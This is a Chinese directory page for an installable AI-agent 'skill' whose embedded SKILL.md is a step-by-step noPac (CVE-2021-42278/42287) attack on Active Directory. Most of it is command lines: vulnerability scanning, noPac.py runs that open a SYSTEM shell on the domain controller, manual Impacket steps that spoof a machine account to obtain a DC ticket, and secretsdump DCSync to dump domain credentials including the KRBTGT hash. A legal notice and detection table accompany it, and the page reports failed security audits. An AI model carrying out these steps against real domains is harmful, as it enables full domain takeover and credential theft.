Token导航 LogoToken导航TokenDH.com
研究检索执行命令github未标认证来源可访问许可证需确认审计异常

exploiting-nopac-cve-2021-42278-42287利用 nopac cve 2021 42278 42287

Agent Skill

exploiting-nopac-cve-2021-42278-42287 用于查找、检索和筛选相关信息,适合在 Codex、Claude、Cursor、Gemini CLI 中需要根据关键词、任务场景或来源线索快速定位候选结果时使用。可结合来源仓库、安装命令和原始 README 继续核验具体用法。安装前建议确认权限范围、维护状态,以及是否会触发联网、命令执行或文件读写。

总安装

380

周安装

16

GitHub Stars

5,904

下载量

133
CodexClaudeCursorGemini CLI

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

GitHub

来源数

2

许可证

unknown

最后核验

2026-05-01

来源状态

来源可访问

安装方式

通过对话安装

复制提示词发给支持本地命令或 Skills 的 AI 助手,先确认命令和权限,再让它执行。

请帮我安装这个 Agent Skill:exploiting-nopac-cve-2021-42278-42287(利用 nopac cve 2021 42278 42287)
来源仓库:https://github.com/mukul975/anthropic-cybersecurity-skills
仓库路径:skills/exploiting-nopac-cve-2021-42278-42287
安装命令:
npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill exploiting-nopac-cve-2021-42278-42287
安装前请先检查当前环境是否支持对应 CLI,并向我确认将要执行的命令、安装目录、联网范围和文件读写权限;确认后再执行。

命令行安装

复制命令到本机终端执行。该命令会通过 npx skills 从第三方来源获取 Skill;本站只展示命令,不托管安装包,也不自动执行。

skills.shnpx skills
npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill exploiting-nopac-cve-2021-42278-42287

简介

用于查找、检索和筛选相关信息,适合在 Codex、Claude、Cursor、Gemini CLI 中快速定位候选结果。

  • 适用于根据关键词、任务场景或来源线索进行信息核验和用法确认。
  • 可结合来源仓库和原始 README 继续验证具体用法和适用条件。
  • 安装前建议确认权限范围、维护状态,以及是否会触发联网或命令执行。
  • 使用前应确保具备授权,避免对未授权系统执行敏感操作。

SKILL.md

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Overview

noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.

When to Use

  • When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287
  • When analyzing malware samples or attack artifacts in a controlled environment
  • When conducting red team exercises or penetration testing engagements
  • When building detection capabilities based on offensive technique understanding

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Objectives

  • Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
  • Create or leverage a machine account with modified sAMAccountName
  • Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
  • Use the DC ticket to perform DCSync and dump domain credentials
  • Achieve Domain Admin access from a standard domain user account
  • Document the complete exploitation chain with evidence

MITRE ATT&CK Mapping

  • T1068 - Exploitation for Privilege Escalation
  • T1136.002 - Create Account: Domain Account
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1003.006 - OS Credential Dumping: DCSync

Workflow

Phase 1: Vulnerability Scanning

  1. Check if the domain is vulnerable using the noPac scanner: # Using cube0x0's noPac scanner python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1 # Using CrackMapExec module crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac
  2. Verify the MachineAccountQuota (default is 10, allows any user to join computers): # Check MachineAccountQuota via LDAP python3 -c " import ldap3 server = ldap3.Server('10.10.10.1') conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True) conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota']) print(conn.entries[0]['ms-DS-MachineAccountQuota']) "

Phase 2: Exploitation with noPac Tool

  1. Run the full noPac exploit chain: # Using cube0x0's noPac (gets a shell on the DC) python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \ -dc-host DC01 -shell --impersonate administrator -use-ldap # Using Ridter's noPac (alternative implementation) python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \ --impersonate administrator -dump
  2. The exploit automatically:

- Creates a new machine account (or uses an existing one) - Renames the machine account's sAMAccountName to match the DC (e.g., "DC01") - Requests a TGT for the spoofed account name - Restores the original sAMAccountName - Uses S4U2self to obtain a service ticket impersonating the target user - The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)

Phase 3: Post-Exploitation

  1. With the obtained Domain Controller ticket, perform DCSync: # DCSync using secretsdump.py with the Kerberos ticket export KRB5CCNAME=administrator.ccache secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local # Or directly through the noPac shell # The shell runs as SYSTEM on the DC
  2. Alternatively, obtain a semi-interactive shell: python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \ -dc-host DC01 -shell --impersonate administrator -use-ldap

Phase 4: Manual Exploitation Steps

  1. Create a machine account: addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \ -dc-ip 10.10.10.1 domain.local/user:'Password123'
  2. Clear the SPN and rename sAMAccountName: # Rename machine account sAMAccountName to DC name (without $) renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \ -dc-ip 10.10.10.1 domain.local/user:'Password123'
  3. Request a TGT for the spoofed name: getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'
  4. Restore the original machine name: renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \ -dc-ip 10.10.10.1 domain.local/user:'Password123'
  5. Use S4U2self for impersonation: export KRB5CCNAME=DC01.ccache getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \ -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'

Tools and Resources

ToolPurposePlatform
noPac (cube0x0)Automated scanner and exploiterPython
noPac (Ridter)Alternative exploit implementationPython
ImpacketKerberos ticket manipulation, DCSyncPython
CrackMapExecVulnerability scanning modulePython
RubeusWindows Kerberos ticket operationsWindows (.NET)
secretsdump.pyPost-exploitation credential dumpingPython

CVE Details

CVEDescriptionCVSSPatch
CVE-2021-42278sAMAccountName spoofing (machine accounts)7.5KB5008102
CVE-2021-42287KDC PAC confusion / privilege escalation7.5KB5008380

Detection Signatures

IndicatorDetection Method
Machine account sAMAccountName changeEvent 4742 (computer account changed) with sAMAccountName modification
New machine account creationEvent 4741 (computer object created)
TGT request for account without trailing $Kerberos audit log analysis
S4U2self requests from non-DC machine accountsEvent 4769 with unusual service ticket requests
Rapid sequence: create account, rename, request TGTSIEM correlation rule for noPac attack pattern

Validation Criteria

  • Domain scanned for noPac vulnerability
  • MachineAccountQuota verified (default 10)
  • Exploit executed successfully (shell or DCSync)
  • Domain Admin privileges obtained from standard user
  • DCSync performed to dump domain credentials
  • KRBTGT hash obtained for persistence validation
  • Attack chain documented with timestamps
  • Patch status verified (KB5008380, KB5008602)

适合场景

01

用户想查找某类 Agent Skill 时

02

需要根据任务场景推荐可安装能力包时

03

需要对比不同来源的安装命令和来源信息时

能力概览

能力 1

按任务关键词查找相关 Skills

能力 2

展示可复制的安装命令

能力 3

保留来源站点、仓库和原始说明,方便继续核验

能力 4

展示第三方安全扫描或审计结果

安装后应在对应宿主中按原始 README 的触发条件使用;具体调用方式请以来源页面和 README 为准。

平台分布

Codex

36.3%
按下载量换算48

Claude

28.01%
按下载量换算37

Cursor

17.47%
按下载量换算23

Gemini CLI

8.73%
按下载量换算12

安全审计

Gen Agent Trust Hub

未通过

Socket

未通过

Snyk

未通过

权限和风险

执行命令

安装流程涉及命令执行,可能通过 npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill exploiting-nopac-cve-2021-42278-42287 联网下载 Skill 或依赖。用户安装前应确认命令来源、仓库内容和执行环境。

安装前确认

本站仅展示第三方公开信息,不托管安装包,不提供自动安装或运行环境。安装前应自行审查源码、依赖和命令行为。来源安全扫描存在 warning/failed 结果,不能写成本站确认安全。当前只有一个来源,正式发布前建议补源仓库或其他目录站核验。

来源信息

继续浏览同类 Skills